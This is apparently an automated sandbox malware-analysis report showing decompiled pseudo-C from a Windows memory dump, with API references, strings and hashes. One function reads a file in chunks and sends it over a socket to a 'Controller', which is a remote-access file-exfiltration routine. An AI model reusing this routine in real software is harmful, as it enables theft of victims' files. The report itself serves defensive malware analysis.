																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = E0077F348(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E0077F949(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															E007801F5(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = E0077F348(_t267 - _t284 >> 1, _t107, 2);
																																E007801F5(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E007815D4( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0077698A();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x7ab4d0; // 0x2d19f60
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E007844C3(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E0077A504();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x7ab4d0; // 0x2d19f60
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x7ab4d4 = E0077F348(_t246, 1, 4);
																				E007801F5(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x7ab4d0 = E0077F348(_t246, 1, 4);
																				E007801F5(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x7ab4d0 - _t221; // 0x2d19f60
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x7ab4d4; // 0x0
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0077D3FB(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x7ab4d4; // 0x0
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E007801F5(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E0077A504();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E0077A504();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x7ab4d0 = E0077F348(_t231, 1, 4);
										E007801F5(_t218);
										_t298 =  *0x7ab4d0; // 0x2d19f60
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x7ab4d4 - _t218; // 0x0
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x7ab4d4 = E0077F348(_t231, 1, 4);
												E007801F5(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x7ab4d4 - _t218; // 0x0
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x7ab4d4 - _t218; // 0x0
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0077D3F6(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x7ab4d0; // 0x2d19f60
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E007801F5(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E0077A504();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}

0x007876b6
0x007876bb
0x007876d2
0x007876d4
0x007876d9
0x007876dd
0x007876de
0x007876e0
0x00787730
0x00787735
0x00000000
0x007876e2
0x007876e2
0x007876e4
0x00000000
0x007876e6
0x007876e6
0x007876ea
0x007876f0
0x007876f3
0x007876f6
0x007876fc
0x007876ff
0x00787704
0x00787706
0x00787709
0x0078770a
0x0078770a
0x00787710
0x00787712
0x00787714
0x007877a8
0x007877ab
0x007877ad
0x007877af
0x007877b0
0x007877b1
0x007877b6
0x007877bb
0x007877bd
0x00787807
0x00787807
0x0078780a
0x00000000
0x00787810
0x00787810
0x00787812
0x00787815
0x00787815
0x00787818
0x0078781a
0x00000000
0x00787820
0x00787820
0x00787826
0x00000000
0x0078782c
0x0078782c
0x0078782e
0x00787836
0x00787838
0x0078783d
0x00787840
0x00787842
0x00000000
0x00787848
0x00787848
0x0078784b
0x0078784d
0x00787850
0x00787853
0x00000000
0x00787853
0x00787842
0x00787826
0x0078781a
0x007877bf
0x007877bf
0x007877c1
0x00000000
0x007877c3
0x007877c6
0x007877cc
0x007877cf
0x007877d2
0x007877e6
0x007877e6
0x007877e9
0x00000000
0x00000000
0x007877de
0x007877e2
0x007877e5
0x007877e5
0x007877e5
0x007877eb
0x007877ed
0x007877f5
0x007877f7
0x007877fc
0x007877ff
0x00787801
0x00787803
0x00787857
0x00787857
0x00787857
0x007877d4
0x007877d4
0x007877d7
0x007877d9
0x007877d9
0x0078785d
0x00787860
0x00000000
0x00787866
0x00787866
0x00787868
0x0078786b
0x0078786b
0x0078786d
0x0078786e
0x0078786e
0x0078787a
0x00787882
0x00787885
0x00787886
0x00787888
0x007878d1
0x007878d2
0x00000000
0x0078788a
0x00787891
0x00787896
0x00787899
0x0078789b
0x007878dd
0x007878de
0x007878df
0x007878e0
0x007878e1
0x007878e2
0x007878e7
0x007878eb
0x007878ed
0x007878f0
0x007878f1
0x007878f4
0x007878f6
0x00787908
0x00787909
0x0078790a
0x0078790d
0x0078790f
0x00787914
0x00787918
0x00787919
0x0078791b
0x0078796c
0x00787971
0x00000000
0x0078791d
0x0078791d
0x0078791f
0x00000000
0x00787921
0x00787921
0x00787927
0x00787929
0x0078792d
0x00787930
0x00787933
0x00787939
0x0078793b
0x0078793c
0x00787942
0x00787945
0x00787947
0x00787947
0x0078794d
0x0078794f
0x007879dc
0x007879e7
0x007879ea
0x007879ef
0x007879f4
0x007879f6
0x00787a40
0x00787a40
0x00787a43
0x00000000
0x00787a49
0x00787a49
0x00787a4b
0x00787a4e
0x00787a4e
0x00787a51
0x00787a53
0x00000000
0x00787a59
0x00787a59
0x00787a5f
0x00000000
0x00787a65
0x00787a65
0x00787a67
0x00787a6f
0x00787a71
0x00787a76
0x00787a79
0x00787a7b
0x00000000
0x00787a81
0x00787a81
0x00787a84
0x00787a86
0x00787a89
0x00787a8c
0x00000000
0x00787a8c
0x00787a7b
0x00787a5f
0x00787a53
0x007879f8
0x007879f8
0x007879fa
0x00000000
0x007879fc
0x007879ff
0x00787a05
0x00787a08
0x00787a0b
0x00787a1f
0x00787a1f
0x00787a22
0x00000000
0x00000000
0x00787a1b
0x00787a1e
0x00787a1e
0x00787a1e
0x00787a24
0x00787a26
0x00787a2e
0x00787a30
0x00787a35
0x00787a38
0x00787a3a
0x00787a3c
0x00787a90
0x00787a90
0x00787a90
0x00787a0d
0x00787a0d
0x00787a10
0x00787a12
0x00787a12
0x00787a96
0x00787a99
0x00000000
0x00787a9f
0x00787a9f
0x00787aa1
0x00787aa1
0x00787aa4
0x00787aa4
0x00787aa7
0x00787aaa
0x00787aaa
0x00787ab5
0x00787ab9
0x00787ac1
0x00787ac4
0x00787ac5
0x00787ac7
0x00787b0e
0x00787b0f
0x00000000
0x00787ac9
0x00787ad1
0x00787ad6
0x00787ad9
0x00787adb
0x00787b1a
0x00787b1b
0x00787b1c
0x00787b1d
0x00787b1e
0x00787b1f
0x00787b24
0x00787b27
0x00787b28
0x00787b2b
0x00787b2c
0x00787b2f
0x00787b31
0x00787b3a
0x00787b3c
0x00787b3e
0x00787b40
0x00787b42
0x00787b42
0x00787b45
0x00787b46
0x00787b46
0x00787b42
0x00787b4c
0x00787b57
0x00787b5a
0x00787b5b
0x00787b5d
0x00787bc4
0x00787bc4
0x00000000
0x00787b5f
0x00787b5f
0x00787b62
0x00787bb4
0x00787bb6
0x00787bbc
0x00000000
0x00787b64
0x00787b64
0x00787b67
0x00787b67
0x00787b69
0x00787b69
0x00787b6b
0x00787b6b
0x00787b6e
0x00787b6e
0x00787b70
0x00787b71
0x00787b71
0x00787b75
0x00787b79
0x00787b7d
0x00787b87
0x00787b8a
0x00787b8f
0x00787b92
0x00787b96
0x00000000
0x00787b98
0x00787ba0
0x00787ba5
0x00787ba8
0x00787baa
0x00787bc9
0x00787bcb
0x00787bcc
0x00787bcd
0x00787bce
0x00787bcf
0x00787bd0
0x00787bd5
0x00787bd8
0x00787bd9
0x00787bdb
0x00787bdc
0x00787bdd
0x00787bde
0x00787be1
0x00787be3
0x00787bec
0x00787bed
0x00787bef
0x00787bf1
0x00787bf3
0x00787bf6
0x00787bf7
0x00787bf9
0x00787bfb
0x00787bfb
0x00787bfe
0x00787bff
0x00787bff
0x00787bfb
0x00787c03
0x00787c0e
0x00787c12
0x00787c14
0x00787c82
0x00787c82
0x00000000
0x00787c16
0x00787c16
0x00787c18
0x00787c72
0x00787c73
0x00787c79
0x00000000
0x00787c1a
0x00787c1c
0x00787c1c
0x00787c1e
0x00787c1e
0x00787c20
0x00787c20
0x00787c23
0x00787c23
0x00787c26
0x00787c29
0x00787c29
0x00787c35
0x00787c39
0x00787c41
0x00787c47
0x00787c4c
0x00787c4f
0x00787c53
0x00000000
0x00787c55
0x00787c5d
0x00787c62
0x00787c65
0x00787c67
0x00787c87
0x00787c89
0x00787c8a
0x00787c8b
0x00787c8c
0x00787c8d
0x00787c8e
0x00787c93
0x00787c96
0x00787c99
0x00787c9a
0x00787c9b
0x00787c9c
0x00787ca2
0x00787ca4
0x00787ca7
0x00787cd3
0x00787cd3
0x00787cd3
0x00787cd8
0x00787ca9
0x00787ca9
0x00787cac
0x00787cb2
0x00787cb7
0x00787cba
0x00787cbc
0x00000000
0x00787cbe
0x00787cc0
0x00787cc3
0x00787cc5
0x00787ce1
0x00787ce3
0x00787cc7
0x00787cc7
0x00787cc9
0x00000000
0x00000000
0x00000000
0x00000000
0x00787cc9
0x00787cc5
0x00000000
0x00787ccb
0x00787ccb
0x00787cce
0x00787cce
0x00000000
0x00787cac
0x00787cda
0x00787ce0
0x00000000
0x00000000
0x00000000
0x00787c67
0x00000000
0x00787c69
0x00787c69
0x00787c6c
0x00787c6c
0x00787c70
0x00787c70
0x00000000
0x00787c70
0x00787c18
0x00787be5
0x00787be5
0x00787c7d
0x00787c81
0x00787c81
0x00000000
0x00000000
0x00000000
0x00787baa
0x00000000
0x00787bac
0x00787bac
0x00787baf
0x00787baf
0x00000000
0x00787bb3
0x00787b62
0x00787b33
0x00787b33
0x00787bbf
0x00787bc3
0x00787bc3
0x00787add
0x00787ae1
0x00787ae4
0x00787aee
0x00787af6
0x00787afc
0x00787afe
0x00787b00
0x00787b05
0x00787b05
0x00787b08
0x00787b08
0x00000000
0x00787afe
0x00787adb
0x00787ac7
0x00787a99
0x007879fa
0x00787955
0x00787955
0x0078795a
0x0078795d
0x0078798a
0x0078798a
0x0078798c
0x00000000
0x0078798e
0x0078798e
0x00787990
0x007879bb
0x007879c5
0x007879ca
0x007879cf
0x00000000
0x00787992
0x0078799c
0x007879a1
0x007879a6
0x007879a9
0x007879af
0x00000000
0x007879b1
0x007879b1
0x007879b7
0x007879b9
0x00000000
0x00000000
0x00000000
0x00000000
0x007879b9
0x007879af
0x00787990
0x0078795f
0x0078795f
0x00787961
0x00000000
0x00787963
0x00787963
0x00787968
0x0078796a
0x007879d2
0x007879d2
0x007879d8
0x007879da
0x00787977
0x00787977
0x00787977
0x0078797a
0x0078797b
0x00787982
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0078796a
0x00787961
0x0078795d
0x0078794f
0x0078791f
0x007878f8
0x007878f8
0x007878fd
0x00787903
0x00787985
0x00787989
0x00787989
0x0078789d
0x007878a6
0x007878ae
0x007878b2
0x007878b9
0x007878bf
0x007878c1
0x007878c3
0x007878c8
0x007878c8
0x007878cb
0x007878cb
0x00000000
0x007878c1
0x0078789b
0x00787888
0x00787860
0x007877c1
0x0078771a
0x0078771a
0x0078771d
0x0078774e
0x0078774e
0x00787750
0x00787760
0x00787765
0x0078776a
0x00787770
0x00787773
0x00787775
0x00000000
0x00787777
0x00787777
0x0078777d
0x00000000
0x0078777f
0x00787789
0x0078778e
0x00787793
0x00787796
0x0078779c
0x00000000
0x00000000
0x00000000
0x00000000
0x0078779c
0x0078777d
0x00787752
0x00787752
0x00000000
0x00787752
0x0078771f
0x0078771f
0x00787725
0x00000000
0x00787727
0x00787727
0x0078772c
0x0078772e
0x0078779e
0x0078779e
0x007877a4
0x007877a4
0x007877a6
0x0078773b
0x0078773b
0x0078773b
0x0078773e
0x0078773f
0x00787746
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0078772e
0x00787725
0x0078771d
0x00787714
0x007876e4
0x007876bd
0x007876bd
0x007876c2
0x007876c8
0x00787749
0x0078774d
0x0078774d
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 007876D4
_free.LIBCMT ref: 0078773F
_free.LIBCMT ref: 00787765
_free.LIBCMT ref: 0078778E
_free.LIBCMT ref: 007877C6
_free.LIBCMT ref: 007877F7
_free.LIBCMT ref: 00787838
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 007878B9
_free.LIBCMT ref: 007878D2
_wcschr.LIBVCRUNTIME ref: 0078790F
_free.LIBCMT ref: 0078797B
_free.LIBCMT ref: 007879A1
_free.LIBCMT ref: 007879CA
_free.LIBCMT ref: 007879FF
_free.LIBCMT ref: 00787A30
_free.LIBCMT ref: 00787A71
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00787AF6
_free.LIBCMT ref: 00787B0F

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
String ID:
API String ID: 2719235668-0
Opcode ID: a3e0a4058cd226b1edd5226457fc115062e589be7fb9077868acc83deea5f33f
Instruction ID: b77a71ff99d1a07339e4a172cf55d449581803c5cb3d6c4a106d136c23e0a4b9
Opcode Fuzzy Hash: a3e0a4058cd226b1edd5226457fc115062e589be7fb9077868acc83deea5f33f
Instruction Fuzzy Hash: E9D15C71989304AFDF29BF748C89A7E7BA4AF05360F64816DF90697292E73DD900C790

Uniqueness

Uniqueness Score: -1.00%

Function 007464A2, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 345
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E007464A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
				long _t136;
				void* _t137;
				signed int _t138;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				long _t198;
				signed int _t203;
				void* _t216;
				union _LARGE_INTEGER _t280;
				intOrPtr _t281;
				union _LARGE_INTEGER* _t295;
				void* _t297;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t278 = __edx;
				_v68 = __ecx;
				E0074498B(__ecx);
				_t302 = _t301 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t299 = _v68;
				E00744A08(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t310 = _t297 - 0xffffffff;
				if(_t297 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t297,  &_v80);
					_t203 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t203;
					_v32 = _t203;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E0074427F(0,  &_v112, _a4);
					_t119 = E0075733B( &_v136,  &_v112);
					_t303 = _t302 - 0x18;
					_t280 = "Uploading file to Controller: ";
					E007475C2(0, _t303, _t280, _t297, __eflags, _t119);
					_t304 = _t303 - 0x14;
					E00742084(0, _t304, "[Info]");
					E00756C80(0, _t297);
					_t305 = _t304 + 0x30;
					E00741FC7();
					E00741EF0();
					_v36 = 1;
					_v40 = 0;
					_t126 = E00790880(_v52, _v48, 0x186a0, 0);
					_t210 = _t280;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t280;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t297);
						E00744E0B(_t299);
						_t198 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t281 = _v32;
									__eflags = _v20 - _t281;
									if(__eflags >= 0) {
										_t210 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t210;
											_v20 = _t281;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t210;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = E0076F4C6(_t210, _t281, _t299, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t306 = _t305 - 0x18;
										_t216 = _t305 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t306 = _t305 - 0x18;
											_t216 = _t305 - 0x18;
											_push("ReadFile error");
											L23:
											E00742084(0, _t216);
											E00742084(0, _t306 - 0x18, "[ERROR]");
											E00756C80(0, _t297);
											E0076F4CF(_v12);
											CloseHandle(_t297);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												E0076F4CF(_v12);
												CloseHandle(_t297);
												E00744E0B(_t299);
												_t145 = 1;
												goto L25;
											} else {
												E0074427F(0,  &_v112, _a4);
												_t154 = E007420AB(0,  &_v472, _t281, __eflags, _v12, _v24);
												_t305 = _t305 - 0x18;
												_t156 = E00757260(0x7ac238,  &_v448, _v88, _v84);
												_t157 = E00757260(0x7ac238,  &_v424, _v36, _v40);
												E00742F1D(_t305, E00742F93(0x7ac238,  &_v136, E00742F93(0x7ac238,  &_v160, E00742F93(0x7ac238,  &_v184, E00742F1D( &_v208, E00742F93(0x7ac238,  &_v232, E00742F1D( &_v256, E00742F93(0x7ac238,  &_v280, E00742F93(0x7ac238,  &_v304, E00742F93(0x7ac238,  &_v328, E00742F93(0x7ac238,  &_v352, E00742F93(0x7ac238,  &_v376, E0075739C(0x7ac238,  &_v400,  &_v112), __eflags, 0x7ac238), __eflags,  &_a8), __eflags, 0x7ac238), __eflags,  &_a32), __eflags, 0x7ac238), _t157), __eflags, 0x7ac238), _t156), __eflags, 0x7ac238), __eflags,  &_a56), __eflags, 0x7ac238), _t154);
												_t299 = _v68;
												_push(0x52);
												_t173 = E00744AA4(0x7ac238, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741FC7();
												E00741EF0();
												__eflags = 0x7ac200 | _t173 == 0xffffffff;
												if((0x7ac200 | _t173 == 0xffffffff) != 0) {
													E00744E0B(_t299);
													CloseHandle(_t297);
													E0076F4CF(_v12);
													_t198 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									E0076F4CF(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t295 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t210 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t210;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t295;
									__eflags = _t295 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t210 - _v52;
							} while (_t210 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E007420EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
					_push(0x53);
					E00744AA4(0, 0x7ac2e8, _t278, _t310);
					L24:
					E00744E0B(_t299);
					_t145 = 0;
					L25:
					_t198 = _t145;
				}
				L18:
				E00741FC7();
				E00741FC7();
				E00741FC7();
				return _t198;
			}

0x007464a2
0x007464ae
0x007464b1
0x007464b6
0x007464c0
0x007464c1
0x007464c2
0x007464c3
0x007464c4
0x007464c9
0x007464d0
0x007464ea
0x007464f3
0x007464f5
0x007464f8
0x0074651c
0x00746521
0x00746524
0x0074652a
0x0074652d
0x00746533
0x00746536
0x0074653c
0x0074653f
0x00746542
0x00746550
0x00746555
0x00746558
0x00746560
0x00746565
0x0074656f
0x00746574
0x00746579
0x00746582
0x0074658a
0x00746595
0x007465a0
0x007465a6
0x007465ae
0x007465b0
0x007465b3
0x007465b6
0x007465b8
0x007465bd
0x007465c0
0x007465c3
0x00746864
0x00746865
0x0074686d
0x00746872
0x007465c9
0x007465c9
0x007465d4
0x007465d7
0x007465dd
0x007465e0
0x007465e0
0x007465e5
0x007465e5
0x007465e5
0x007465e5
0x007465e8
0x007465eb
0x007465ed
0x007465f0
0x007465f6
0x007465f6
0x007465f8
0x007465fb
0x007465f2
0x007465f2
0x007465f4
0x00000000
0x00000000
0x007465f4
0x007465f0
0x007465fe
0x007465ff
0x00746605
0x0074660a
0x00746610
0x00746614
0x0074661a
0x0074661c
0x007468da
0x007468dd
0x007468df
0x00000000
0x00746622
0x0074662f
0x00746635
0x00746637
0x007468ce
0x007468d1
0x007468d3
0x007468e4
0x007468e4
0x007468f3
0x007468f8
0x00746900
0x00746909
0x00000000
0x0074663d
0x0074663d
0x00746641
0x007468b5
0x007468bc
0x007468c4
0x007468cb
0x00000000
0x00746647
0x0074664d
0x0074665e
0x00746663
0x00746680
0x00746695
0x00746754
0x00746759
0x0074675d
0x00746761
0x00746766
0x00746772
0x0074677d
0x00746788
0x00746793
0x0074679e
0x007467a9
0x007467b4
0x007467bf
0x007467ca
0x007467d5
0x007467e0
0x007467eb
0x007467f6
0x00746801
0x0074680c
0x00746814
0x00746819
0x0074681b
0x00746899
0x0074689f
0x007468a8
0x007468ae
0x00000000
0x00000000
0x00000000
0x0074681b
0x00746641
0x00746637
0x00000000
0x0074681d
0x00746820
0x00746825
0x00746828
0x0074682b
0x00746832
0x00746835
0x00746839
0x00746841
0x00746842
0x00746845
0x00746847
0x0074684a
0x0074684d
0x00746850
0x00746850
0x00746859
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0074685b
0x0074685b
0x0074685b
0x00000000
0x007465cb
0x007465cb
0x007465ce
0x00000000
0x00000000
0x00000000
0x00000000
0x007465ce
0x007465c9
0x007464fa
0x00746503
0x00746508
0x0074650f
0x0074690f
0x00746911
0x00746916
0x00746918
0x00746918
0x00746918
0x00746874
0x00746877
0x0074687f
0x00746887
0x00746894

APIs

Part of subcall function 00744A08: connect.WS2_32(?,007ADBA0,00000010), ref: 00744A23

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 007464ED
GetFileSizeEx.KERNEL32(00000000,?), ref: 00746524
__aulldiv.LIBCMT ref: 007465A6
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00746614
ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0074662F

Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18

Part of subcall function 00744E0B: closesocket.WS2_32(?), ref: 00744E11

Strings

Uploading file to Controller: , xrefs: 00746558
[Info], xrefs: 0074656A
[ERROR], xrefs: 007468EE
ReadFile error, xrefs: 007468D3
SetFilePointerEx error, xrefs: 007468DF

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
API String ID: 1319223106-2190262076
Opcode ID: e117eca8f368c2453e13d105699e296c9a17afebceecae167163bd79dbb31009
Instruction ID: ae95c942760a3fb21661aaa475cae4252ac8cc127bfab7b2b374bd2b2f682de6
Opcode Fuzzy Hash: e117eca8f368c2453e13d105699e296c9a17afebceecae167163bd79dbb31009
